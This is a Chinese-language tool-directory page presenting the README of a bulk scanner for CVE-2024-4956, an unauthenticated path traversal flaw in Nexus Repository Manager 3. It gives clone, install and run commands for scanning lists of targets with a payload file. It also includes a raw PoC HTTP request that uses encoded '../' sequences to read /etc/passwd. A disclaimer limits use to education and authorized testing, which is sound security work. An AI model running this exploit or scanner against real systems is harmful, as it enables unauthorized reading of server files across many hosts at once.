Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-4956-Bulk-Scanner — [CVE-2024-4956] Nexus Repository Manager 3 未认证路径遍历批量扫描器 | Kitploit
工具/GitHubGitHub/ifconfig-me/cve-2024-4956-bulk-scanner
漏洞扫描器漏洞利用Web应用程序漏洞利用信息收集渗透测试学习与教育
GitHubifconfig-me/cve-2024-4956-bulk-scanner

CVE-2024-4956-Bulk-Scanner

[CVE-2024-4956] Nexus Repository Manager 3 未认证路径遍历批量扫描器

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
176152年前尚未审核
分享

README.md

CVE-2024-4956 批量扫描器

免责声明

该工具仅用于教育目的和企业环境测试。https://twitter.com/nav1n0x/ 和 https://github.com/ifconfig-me 对滥用此代码不承担任何责任。请自行承担风险。不要攻击你没有权限接触的目标。该工具使用了公开发布的负载。

该扫描器帮助安全爱好者批量扫描 Nexus Repository 目标中的路径遍历漏洞。

扫描器将显示加载的目标数量及当前扫描状态。URL 将根据结果列出三种状态信息:超时、失败或成功。请确保 targets.txt 包含域名列表,lfi-payloads.txt 包含负载列表。扫描器将显示当前正在测试的 URL,每次新请求都会更新,并分别指示成功或失败。脚本还会将成功 URL 列表保存到目录中的 successful_urls.txt 文件中。它将在最后提供成功尝试数量的摘要。

安装

确保已安装 Python 3.6+ 和 pip。

  1. 克隆仓库:

    • git clone https://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner.git
    • cd CVE-2024-4956-Bulk-Scanner
  2. 安装所需依赖:

    pip install -r requirements.txt

使用说明

  1. 准备 targets.txt 文件,包含域名列表,以及 lfi-payloads.txt,包含负载列表。

  2. 运行扫描器:

    python3 CVE-2024-4956-scanner.py -d targets.txt -p lfi-payloads.txt

PoC

GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: target.com:8081
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

攻击成功

图片

扫描器运行中

图片

免责声明

该工具仅用于教育目的和企业环境测试。 https://twitter.com/nav1n0x/ 和 https://github.com/ifconfig-me 对代码不承担任何责任。 请自行承担风险。不要攻击你没有权限接触的目标。

下载工具